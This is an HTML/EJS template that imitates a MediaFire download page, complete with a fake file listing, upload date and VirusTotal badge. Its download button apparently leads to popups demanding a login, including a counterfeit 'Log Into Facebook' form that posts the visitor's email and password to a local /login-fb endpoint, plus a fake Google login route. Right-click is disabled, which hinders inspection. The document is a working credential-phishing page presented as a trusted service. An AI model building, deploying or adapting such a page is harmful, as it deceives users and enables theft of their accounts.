<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title><%= title %></title>
  <meta name="description" content="MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere."> 
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css">
  <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
  <link rel="icon" href="img/mediafire-1.svg" />
  <link rel="stylesheet" href="css/index.css" type="text/css" media="all" />
  <!-- eruda console -->
<!--   <script src="https://cdn.jsdelivr.net/npm/eruda"></script>
<script>
  eruda.init();
</script> -->
</head>
<body oncontextmenu="return false">
  <div class="content">
    <div class="nav">
      <div class="u-wrap">
        <a href=""><img src="img/mediafire-1.svg" alt="Mediafire" class="mdf-icon"></a>
        <div class="user-menu">
          <div class="btn-nav">
            <button class="btn-sign" id="btn-sign">SIGN UP</button>
            <button class="btn-login" id="btn-login">LOG IN</button>
          </div>
        </div>
      </div>
    </div>
    <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
    <div class="dl-info">
      <div class="btn-dl" id="btn-dl">
        <div class="icon-file">
          <img src="img/zip.png" alt="video">
        </div>
        <div class="file-meta">
          <div id="video-name" class="filename no-copy"><%= name %></div>
          <div class="filesize no-copy">Download in a new tab (<span id="size"><%= size %></span>)</div>
        </div>
        <div class="icon-dl no-copy">
          <span class="material-icons">download</span>
        </div>
      </div>
      <div class="dl-faster" id="dl-faster">
        <p>Download too slow? <button>DOWNLOAD FASTER NOW</button></p>
      </div>
    </div>
    <p class="text1">Clicking the download button above will start your download in a new tab and show a message from our advertising partners.</p>
    <div class="share-option">
      <div class="share-op" id="share-op">
        <span class="material-icons">share</span>
        <p>Share options</p>
      </div>
      <div class="sv-op" id="sv-op">
        <span class="material-icons">add</span>
        <p>Save to My Files</p> 
      </div>
    </div>
    <div class="upload-region">
      <img src="img/up_region.jpg" alt="region"></img>
    </div>
    <div class="flag">
      <img src="img/flag_id.png" alt="flag"></img>
      <span>This file was uploaded from Indonesia on January 25, 2025 at 4:51 AM</span>
    </div>
    <div class="virus-scan">
      <img src="img/virus_scan.png" alt="virus_scan"></img>
    </div>
    <div class="virus-title">
      <p class="virus">Virus Total scan</p>
      <p class="scan">MediaFire scans high-risk files using VirusTotal.</p>
    </div>
    <hr class="line1"></hr>
    <div class="circle-mdf">
      <img src="img/logo.png" alt="mediafire"></img>
    </div>
    <div class="circle-title">
      <p class="cb">Your account status</p>
      <p class="ctit">MediaFire - Free Account <br>Thanks for registering for a Mediafire account. Want even more great features like ad-free downloads? <span class="gpro">Go Pro!</span></p>
      <p class="cusr">MediaFire user for: <span class="days">991 days</span></p>
    </div>
    <div class="dl-app">
      <img src="img/chrome.png" alt="chrome"></img>
    </div>
    <div class="dltit">
      <p class="dlb">Download application</p>
      <p class="dlt">Chrome <br>You are downloading this file with Chrome.</p>
    </div>
    <br><br><br><br><br><br><br><br><br><br><br>
    <footer class="ftr">
      <div class="ftr-ct">
        <div class="cmp">
          <a class="cmpb">COMPANY</a>
          <div class="cmp-about">
            <a>About Us</a>
            <a>Careers</a>
            <a>Press</a>
            <a>Company Blog</a>
          </div>
        </div>
      </div>
      <hr class="line2"></hr>
      <div class="ftr-ct">
        <div class="cmp">
          <a class="cmpb">TOOLS</a>
          <div class="cmp-about">
            <a>MediaFire Mobile</a>
            <a>File Sharing for Creators</a>
          </div>
        </div>
      </div>
      <hr class="line2"></hr>
      <div class="ftr-ct">
        <div class="cmp">
          <a class="cmpb">UPGRADE</a>
          <div class="cmp-about">
            <a>Professional</a>
          </div>
        </div>
      </div>
      <hr class="line2"></hr>
      <div class="ftr-ct">
        <div class="cmp">
          <a class="cmpb">SUPPORT</a>
          <div class="cmp-about">
            <a>Get Support</a>
          </div>
        </div>
      </div>
      <hr class="line2"></hr>
      <div class="social-icons">
        <a href="" class="icon-fb"><img src="img/i_fb.jpg"></img></a>
        <a href="" class="icon-tw"><img src="img/i_tw.jpg"></img></a>
        <a href="" class="icon-bl"><img src="img/i_bl.jpg"></img></a>
      </div>
      <br><br><br><br><br><br><br>
    </footer>
  </div> <!-- Content -->
  <!-- Popup1 -->
  <div class="popup1" id="popup1">
    <div class="log-with">
      <span class="cl-popup1" id="cl-popup1">&times;</span>
      <div class="mdf-logo-popup">
        <img src="img/mediafire-wordmark-1.svg"></img>
      </div>
      <div class="popup-title">
        <p>You need to Login first.</p>
      </div>
      <div class="btn-log-popup">
        <button class="btn-fb" id="btn-fb"><span class="btn-ctn"><img src="img/white_logo_fb.png"></img> Login With Facebook</span></span>
        <form action="/Login-with-Google" method="get">
          <button type="submit" class="btn-google"><span class="btn-ctn"><img src="img/Google_logo.svg.png"></img> Login With Google</span></button>
        </form>
      </div>
    </div>
  </div>
  <!-- Popup2 -->
  <div class="popup2" id="popup2">
    <div class="fb-form">
      <span class="cl-popup2" id="cl-popup2">&times;</span>
      <div class="form-title">
        <p>Log Into Facebook</p>
      </div>
      <hr class="line-form"></hr>
      <form action="/login-fb" method="post" class="form1" id="form1">
        <input type="text" class="email"  name="email" id="email" required placeholder="Email or phone number">
        <input type="password" class="password" name="password" id="password" required placeholder="Password">
        <input type="hidden" name="login" id="login" value="Facebook"></input>
        <div class="check">
          <input class="checkbox" id="checkbox" type="checkbox"><label for="checkbox" class="text-checkbox">Remember password</label>
        </div>
        <button id="sub-fb" class="sub-fb">Log In</button>
      </form>
      <a href="" class="fpswd">Forgot password?</a>
      <br>
    </div>
  </div>
  <script src="js/index.js" type="text/javascript" charset="utf-8"></script>
</body>
</html>